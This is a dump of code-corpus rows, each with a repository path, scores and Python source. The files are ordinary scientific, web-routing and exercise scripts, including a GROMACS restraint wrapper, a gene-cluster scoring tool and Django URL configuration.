print(a_future)
print(b_future)
# time.sleep(2)
#
# print(a_future.result())
# print(b_future.result())
print(f"finished at {time.strftime('%X')}")
| 3.515625 | 4 |
src/idms/functions.py | ProvZH/opentext | 1 | 12786340 | <reponame>ProvZH/opentext<filename>src/idms/functions.py
# from mimetype_description import get_mime_type_description
def mimetype2FileType(mimetype: str) -> str:
"""
Lookup table for mime type to file type.
"""
convertDict = {
"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet": "Excel",
"application/x-zip-compressed": "Compressed folder",
"application/x-outlook-msg": "Mail message",
"application/octet-stream": "Data file (csv?)"
}
return convertDict.get(mimetype) or "Mimetype not Found: " + str(mimetype) # or get_mime_type_description(mimetype) | 2.296875 | 2 |
msl/equipment/config.py | SwiftyMorgan/msl-equipment | 0 | 12786341 | """
Load an XML :ref:`configuration_file`.
"""
import os
import logging
from xml.etree import cElementTree as ET
from .database import Database
logger = logging.getLogger(__name__)
class Config(object):
PyVISA_LIBRARY = '@ni'
""":class:`str`: The PyVISA backend_ library to use.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
"""
DEMO_MODE = False
""":class:`bool`: Whether to open connections in demo mode.
The equipment does not need to be physically connected to a computer.
"""
PATH = []
""":class:`list` of :class:`str`: Paths are also appended to :data:`os.environ['PATH'] <os.environ>`."""
def __init__(self, path):
"""Load an XML :ref:`configuration_file`.
This function is used to set the configuration constants to use for the Python runtime
and it allows you to access :class:`.EquipmentRecord`'s from an :ref:`equipment_database`
and :class:`.ConnectionRecord`'s from a :ref:`connections_database`.
**MSL-Equipment** constants that can be defined in a :ref:`configuration_file`:
+----------------+-----------------------------------+-----------------------------------------+
| Name | Example Values | Description |
+================+===================================+=========================================+
| pyvisa_library | @ni, @py, @sim, /path/to/lib\@ni | The PyVISA backend_ library to use. |
+----------------+-----------------------------------+-----------------------------------------+
| demo_mode | true, false | Whether to open connections in demo |
| | | mode. |
+----------------+-----------------------------------+-----------------------------------------+
| path | /path/to/SDKs, D:/images | A path that contains external resources.|
| | | Accepts a *recursive="true"* attribute. |
| | | Appends the path(s) to |
| | | :data:`os.environ['PATH'] <os.environ>` |
| | | and to :attr:`.PATH` |
+----------------+-----------------------------------+-----------------------------------------+
Also, the user is encouraged to define their own application-specific constants within the
configuration file.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
Parameters
----------
path : :class:`str`
The path to an XML :ref:`configuration_file`.
Raises
------
IOError
If `path` does not exist or if the :ref:`configuration_file` is invalid.
"""
logger.debug('Loading {}'.format(path))
try:
self._root = ET.parse(path).getroot()
parse_err = ''
except ET.ParseError as err:
parse_err = str(err)
if parse_err:
raise IOError(parse_err)
self._path = path
self._database = None
element = self._root.find('pyvisa_library')
if element is not None:
Config.PyVISA_LIBRARY = element.text
logger.debug('update Config.PyVISA_LIBRARY = {}'.format(Config.PyVISA_LIBRARY))
element = self._root.find('demo_mode')
if element is not None:
Config.DEMO_MODE = element.text.lower() == 'true'
logger.debug('update Config.DEMO_MODE = {}'.format(Config.DEMO_MODE))
for element in self._root.findall('path'):
if not os.path.isdir(element.text):
logger.warning('Not a valid PATH ' + element.text)
continue
if element.attrib.get('recursive', 'false').lower() == 'true':
for root, dirs, files in os.walk(element.text):
Config.PATH.append(root)
else:
Config.PATH.append(element.text)
for p in Config.PATH:
os.environ['PATH'] += os.pathsep + p
logger.debug('append Config.PATH %s', p)
@property
def path(self):
""":class:`str`: The path to the configuration file."""
return self._path
@property
def root(self):
"""Returns the root element (the first node) of the XML tree.
Returns
-------
:class:`~xml.etree.ElementTree.Element`
The root element.
"""
return self._root
def database(self):
"""
Returns
-------
:class:`~.database.Database`
A reference to the equipment and connection records in the database(s)
that are specified in the configuration file.
"""
if self._database is None:
self._database = Database(self._path)
return self._database
def value(self, tag):
"""Gets the value associated with the specified `tag` in the configuration file.
Parameters
----------
tag : :class:`str`
The name of a XML tag in the configuration file.
Returns
-------
:class:`str` or :data:`None`
The value associated with the `tag` or :data:`None` if the tag cannot be found.
"""
element = self._root.find(tag)
if element is not None:
return element.text
return None
| 3.03125 | 3 |
gromacs_wrapper/genrestr.py | bioexcel/virtualscreening | 3 | 12786342 | #!/usr/bin/env python
"""Python wrapper module for the GROMACS genrestr module
"""
import sys
import re
import json
import os
import configuration.settings as settings
from command_wrapper import cmd_wrapper
from tools import file_utils as fu
class Genrestr(object):
"""Wrapper class for the GROMACS genrestr module.
Args:
input_structure_path (str): Path to the input structure PDB/GRO/TPR file.
input_ndx_path (str): Path to the input index NDX file.
input_top_zip_path (str): Path the input TOP topology in zip format.
output_top_zip_path (str): Path the output TOP topology in zip format.
properties (dic):
| **output_top_path** (*str*): Path the output TOP file.
| **output_itp_path** (*str*): Path to the output include for topology ITP file.
| **force_constants** (*float[3]*): Array of three floats defining the force constants
"""
def __init__(self, input_structure_path, input_ndx_path, input_top_zip_path,
output_top_zip_path, properties, **kwargs):
if isinstance(properties, basestring):
properties=json.loads(properties)
self.input_structure_path = input_structure_path
self.input_ndx_path = input_ndx_path
self.input_top_zip_path = input_top_zip_path
self.output_top_zip_path = output_top_zip_path
self.output_itp_path = properties.get('output_itp_path','restrain.itp')
self.output_top_path = properties.get('output_top_path','restrain.top')
self.force_constants = properties.get('force_constants','500 500 500')
self.restricted_group = properties.get('restricted_group', 'system')
self.gmx_path = properties.get('gmx_path',None)
self.mutation = properties.get('mutation',None)
self.step = properties.get('step',None)
self.path = properties.get('path','')
self.mpirun = properties.get('mpirun',False)
self.mpirun_np = properties.get('mpirun_np',None)
def launch(self):
"""Launches the execution of the GROMACS pdb2gmx module.
"""
out_log, err_log = fu.get_logs(path=self.path, mutation=self.mutation, step=self.step)
self.output_top_path = fu.add_step_mutation_path_to_name(self.output_top_path, self.step, self.mutation)
self.output_itp_path = fu.add_step_mutation_path_to_name(self.output_itp_path, self.step, self.mutation)
gmx = "gmx" if self.gmx_path is None else self.gmx_path
cmd = [gmx, "genrestr", "-f", self.input_structure_path,
"-n", self.input_ndx_path, "-o", self.output_itp_path,
"-fc", self.force_constants]
if self.mpirun_np is not None:
cmd.insert(0, str(self.mpirun_np))
cmd.insert(0, '-np')
if self.mpirun:
cmd.insert(0, 'mpirun')
if self.mpirun:
cmd.append('<<<')
cmd.append('\"'+self.restricted_group+'\"')
else:
cmd.insert(0, '|')
cmd.insert(0, '\"'+self.restricted_group+'\"')
cmd.insert(0, 'echo')
command = cmd_wrapper.CmdWrapper(cmd, out_log, err_log)
returncode = command.launch()
fu.unzip_top(zip_file=self.input_top_zip_path, top_file=self.output_top_path)
out_log.info('Unzip: '+ self.input_top_zip_path + ' to: '+self.output_top_path)
with open(self.output_top_path, 'r') as fin:
for line in fin:
if line.startswith('#ifdef POSRES'):
itp_name = re.findall('"([^"]*)"',fin.next())[0]
out_log.debug('itp_name: '+itp_name)
break
# with open(self.output_top_path, 'r') as fin:
# data = fin.read().splitlines(True)
# index = data.index('#ifdef POSRES\n')
# data[index+2] = 'system\n'
# data.insert(index, '\n')
# data.insert(index, '#endif\n')
# data.insert(index, '#include "'+self.output_itp_path+'"\n')
# data.insert(index, '#ifdef CUSTOM_POSRES\n')
# data.insert(index, '; Include Position restraint file\n')
# # data.insert(index, '#include "'+self.output_itp_path+'"\n')
# # data.insert(index, '; Include genrestr generated itp\n')
# with open(self.output_top_path, 'w') as fout:
# fout.writelines(data)
with open(self.output_itp_path, 'r') as fin:
data = fin.read().splitlines(True)
# data.insert(0, '\n')
# data.insert(0, 'system 3\n')
# data.insert(0, ';Name nrexcl\n')
# data.insert(0, '[ system ]\n')
with open(itp_name, 'w') as fout:
fout.writelines(data)
os.remove(self.output_itp_path)
# zip topology
fu.zip_top(self.output_top_path, self.output_top_zip_path, remove_files=False)
out_log.info('Zip: '+ self.output_top_path +' to: '+ self.output_top_zip_path)
return returncode
#Creating a main function to be compatible with CWL
def main():
system=sys.argv[1]
step=sys.argv[2]
properties_file=sys.argv[3]
prop = settings.YamlReader(properties_file, system).get_prop_dic()[step]
Pdb2gmx(input_structure_pdb_path=sys.argv[4],
output_gro_path=sys.argv[5],
output_top_zip_path=sys.argv[6],
properties=prop).launch()
if __name__ == '__main__':
main()
| 2.34375 | 2 |
euler/e7.py | volkerha/DT211-3-Cloud | 0 | 12786343 | primeCount = 0
prime = 2
loopCount = 2
#check if numer is prime
def isPrime(p):
for i in range(2, p):
if p % i == 0:
return 0
return 1
#loop until the 10001st prime number
while primeCount < 10001:
#prime? increse primecount
if isPrime(loopCount) == 1:
primeCount += 1
prime = loopCount
loopCount += 1
#last prime number
print(prime)
| 3.984375 | 4 |
dataloaders/__init__.py | kopetri/MIDAS_pytorch | 2 | 12786344 | # -*- coding: utf-8 -*-
# @Time : 2018/10/21 20:43
# @Author : <NAME>
# @Email : <EMAIL> | 0.917969 | 1 |
public_admin/urls.py | smegurus/smegurus-django | 1 | 12786345 | <gh_stars>1-10
from django.conf.urls import include, url
from public_admin.views import dashboard_view, organization_view
urlpatterns = (
url(r'^janitor/organization/create/(.*)/2/$', organization_view.organization_create_2_page, name='public_admin_organization_create_2'),
url(r'^janitor/organization/create/(.*)/1/$', organization_view.organization_create_1_page, name='public_admin_organization_create_1'),
url(r'^janitor/organization/initialize$', organization_view.organization_initialization_page, name='public_admin_organization_initialization'),
url(r'^janitor/organization/list$', organization_view.organization_master_page, name='public_admin_organization_master'),
url(r'^janitor/organization$', organization_view.organization_menu_page, name='public_admin_organization'),
url(r'^janitor$', dashboard_view.dashboard_master_page, name='public_admin_dashboard_master'),
)
| 1.789063 | 2 |
problems/test_0059_one_loop.py | chrisxue815/leetcode_python | 1 | 12786346 | <filename>problems/test_0059_one_loop.py
import unittest
from typing import List
import utils
# O(n) time. O(1) space. Matrix, one loop.
class Solution:
def generateMatrix(self, n: int) -> List[List[int]]:
m = [[0] * n for _ in range(n)]
r, c, dr, dc = 0, 0, 0, 1
for i in range(1, n * n + 1):
m[r][c] = i
if m[(r + dr) % n][(c + dc) % n]:
dr, dc = dc, -dr
r += dr
c += dc
return m
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().generateMatrix(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| 3.421875 | 3 |
backend/backend/routing.py | Trevor-Mansfield/WalmartReceiptSplitter | 0 | 12786347 | from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter
import cost_claimer.routing
import cost_claimer.consumers
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(
URLRouter(
cost_claimer.routing.websocket_urlpatterns
)
),
"channel": ChannelNameRouter({
"user_action": cost_claimer.consumers.GroupCostWorker,
}),
})
| 1.859375 | 2 |
URI/1010.py | leilaapsilva/BabySteps | 37 | 12786348 | <reponame>leilaapsilva/BabySteps
peca1 = input().split()
peca2 = input().split()
quantidadePeca1 = int(peca1[1])
quantidadePeca2 = int(peca2[1])
valorPeca1 = float(peca1[2])
valorPeca2 = float(peca2[2])
total = (quantidadePeca1 * valorPeca1) + (quantidadePeca2 * valorPeca2)
print("VALOR A PAGAR: R$ {:.2f}".format(total))
| 3.578125 | 4 |
process/4_score.py | omarmaddouri/GCNCC_1 | 4 | 12786349 | <filename>process/4_score.py<gh_stars>1-10
from __future__ import division
from __future__ import print_function
from pathlib import Path
import sys
project_path = Path(__file__).resolve().parents[1]
sys.path.append(str(project_path))
import tensorflow as tf
import os
import numpy as np
from collections import defaultdict
import csv
from scipy import stats
# Settings
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_string('train_dataset', 'brc_microarray_netherlands', 'Train dataset string.')
flags.DEFINE_string('test_dataset', 'brc_microarray_usa', 'Test dataset string.')
flags.DEFINE_string('clustering_method', 'geometric_ap', 'Name of the clustering method.')
flags.DEFINE_string('embedding_method', 'gcn', 'Name of the embedding method.')
flags.DEFINE_string('scoring_data', 'full_data.txt', 'Full data to be used for clusters scoring.')
flags.DEFINE_string('clusters', 'clusters.txt', 'Name of clusters file.')
flags.DEFINE_list('labels', ["free", "metastasis"], 'List of class labels.')
#Check data availability
if not os.path.isdir("{}/data/parsed_input/{}".format(project_path, FLAGS.train_dataset)):
sys.exit("{} dataset is not available under data/parsed_input/".format(FLAGS.train_dataset))
if not os.path.isfile("{}/data/parsed_input/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.scoring_data)):
sys.exit("{} file is not available under /data/parsed_input/{}/".format(FLAGS.scoring_data, FLAGS.train_dataset))
if not os.path.isfile("{}/data/output/{}/clustering/{}/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.clusters)):
sys.exit("{} file is not available under /data/output/{}/clustering/{}/{}".format(FLAGS.clusters, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method))
if not os.path.isdir("{}/data/output/{}/scoring/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method)):
os.makedirs("{}/data/output/{}/scoring/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method))
print("----------------------------------------")
print("----------------------------------------")
print("Configuration:")
print("Training dataset: {}".format(FLAGS.train_dataset))
print("Testing dataset: {}".format(FLAGS.test_dataset))
print("Clustering Method: {}".format(FLAGS.clustering_method))
print("Embedding Method: {}".format(FLAGS.embedding_method))
print("Class labels: {}".format(FLAGS.labels))
print("----------------------------------------")
print("----------------------------------------")
scoring_data = np.genfromtxt("{}/data/parsed_input/{}/{}".format(project_path, FLAGS.test_dataset, FLAGS.scoring_data), dtype=np.dtype(str), skip_footer=1)
clusters = open("{}/data/output/{}/clustering/{}/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.clusters), encoding="utf-8")
#Use eps value to adjust transformed values with very low pdf
eps = np.finfo(np.double).eps
np.random.seed(seed=123)
label_samples = scoring_data[:,-1]
idx_label_samples = {}
for label in FLAGS.labels:
idx_label_samples[label] = np.ravel(np.where(label_samples==label))
score_clusters = {}
score_clusters["cluster_index"] = ["activity_score", "cluster_size"]
cluster_index = 0
print("Scoring of clusters...")
for line in clusters:
line = line.strip()#To remove spaces
members = np.asarray(line.split("\t")[1:], dtype=np.int32)
current_cluster_features = np.asarray(scoring_data[:,members].T, dtype=np.float32) #Transpose to make the genes in row
# Remove missing gene expressions
current_cluster_features = current_cluster_features[~np.all(current_cluster_features == 0, axis=1)]
if(current_cluster_features.shape[0] != 0):
phenotype1 = current_cluster_features[:, idx_label_samples[FLAGS.labels[0]]] #Select the samples under phenotype 1
phenotype2 = current_cluster_features[:, idx_label_samples[FLAGS.labels[1]]] #Select the samples under phenotype 2
mu1 = np.mean(phenotype1, axis=1)
std1 = np.std(phenotype1, axis=1)
std1[std1<eps] = eps
mu2 = np.mean(phenotype2, axis=1)
std2 = np.std(phenotype2, axis=1)
std2[std2<eps] = eps
l = phenotype1.shape[1]
for i in range(current_cluster_features.shape[0]):
row = np.concatenate((phenotype1[i,:], phenotype2[i,:]))
N1 = stats.norm(mu1[i],std1[i]).pdf(row)
N2 = stats.norm(mu2[i],std2[i]).pdf(row)
#Cutoff of outliers
N1[N1<eps] = eps
N2[N2<eps] = eps
row = np.log(N1) - np.log(N2)
if(np.count_nonzero(row) == 0):
transformed_row = row
else:
transformed_row = stats.zscore(row)
phenotype1[i,:] = transformed_row[:l]
phenotype2[i,:] = transformed_row[l:]
aggregated_phenotype1 = np.sum(phenotype1, axis=0, dtype=np.float32)
aggregated_phenotype2 = np.sum(phenotype2, axis=0, dtype=np.float32)
t, p = stats.ttest_ind(aggregated_phenotype1, aggregated_phenotype2, equal_var = False)
else:
t=0
p=1
cluster_size = members.shape[0]
score_clusters[cluster_index] = [np.abs(t), cluster_size]
cluster_index+=1
clusters.close()
if(FLAGS.train_dataset == FLAGS.test_dataset):
with open("{}/data/output/{}/scoring/{}/{}/clusters.scores.txt".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method), "w", newline='', encoding="utf-8") as f:
w_scores = csv.writer(f, delimiter ='\t')
for key, val in score_clusters.items():
w_scores.writerow([key, val[0], val[1]])
print("Successful generation of cluster scores in /data/output/{}/scoring/{}/{}/clusters.scores.txt".format(FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method))
else:
with open("{}/data/output/{}/scoring/{}/{}/cross.{}.clusters.scores.txt".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.test_dataset), "w", newline='', encoding="utf-8") as f:
w_scores = csv.writer(f, delimiter ='\t')
for key, val in score_clusters.items():
w_scores.writerow([key, val[0], val[1]])
print("Successful generation of cluster scores in /data/output/{}/scoring/{}/{}/cross.{}.clusters.scores.txt".format(FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.test_dataset)) | 2.078125 | 2 |
people_filterNetwork.py | dpastoresc/NarrativeDynamics | 1 | 12786350 | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
import seaborn as sns
import mysql.connector
from sqlalchemy import create_engine
import nltk
import re
from nltk.corpus import stopwords
import string
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
from nltk.stem import SnowballStemmer
import pickle
import itertools
import networkx as nx
import time
from datetime import datetime, timedelta, date
from timeit import default_timer as timer
from sys import argv
db_name_table = 'PostsMadCar'#str(argv[1])
#db_name_table = 'PostsCorMad'#str(argv[1])
db2='UsersMadCar'#str(argv[1])
#db2='UsersCorMad'#str(argv[1])
datapath='/home/davidpastor/Narrativas/MadCar/'
#datapath='/home/davidpastor/Narrativas/CorMad/'
tag=''
th=10
start=timer()
path_graphs = 'People/'
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'.cnf', 'rb') as handle:
Gu=pickle.load(handle)
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'.cnf', 'rb') as handle:
G=pickle.load(handle)
with open(datapath+path_graphs+db2+'People'+tag+'.cnf', 'rb') as handle:
People=pickle.load(handle)
Gu.remove_node('None')
G.remove_node('None')
nu=Gu.nodes()
vu=[]
gudata=Gu.nodes.data()
for n in nu:
vu.append(Gu.degree(n))
# if 'followers' in gudata[n]:
# print('hola')
print(len(vu))
vuc=[i for i in vu if i>10]
print(len(vuc))
sns.set_style('darkgrid')
sns_plot = sns.distplot(vu)
sns_plot.figure.savefig("Gu_nodehist.png")
ns=G.nodes()
v=[]
gdata=G.nodes.data()
for n in ns:
v.append(G.out_degree(n))
# if 'followers' in gdata[n]:
# print('hola')
print(len(v))
vc=[i for i in v if i>10]
print(len(vc))
v2=[]
for n in ns:
v2.append(G.in_degree(n))
print(len(v2))
vc2=[i for i in v2 if i>10]
print(len(vc2))
sns.set_style('darkgrid')
sns_plot = sns.distplot(v)
sns_plot.figure.savefig("G_nodehist.png")
Guf=Gu.copy()
nus=Gu.nodes()
for n in nus:
dn=Gu.degree(n)
if dn<th:
Guf.remove_node(n)
Gf=G.copy()
ns=G.nodes()
for n in ns:
dn=G.out_degree(n)
if dn<th:
Gf.remove_node(n)
print(len(Guf.nodes()))
print(len(Gf.nodes()))
path_graphs = 'People/'
nx.write_gexf(Guf, datapath+path_graphs+db_name_table+'NetworkGraphPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Guf, handle, protocol=pickle.HIGHEST_PROTOCOL)
nx.write_gexf(Gf, datapath+path_graphs+db_name_table+'NetworkGraphDPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Gf, handle, protocol=pickle.HIGHEST_PROTOCOL) | 2.390625 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.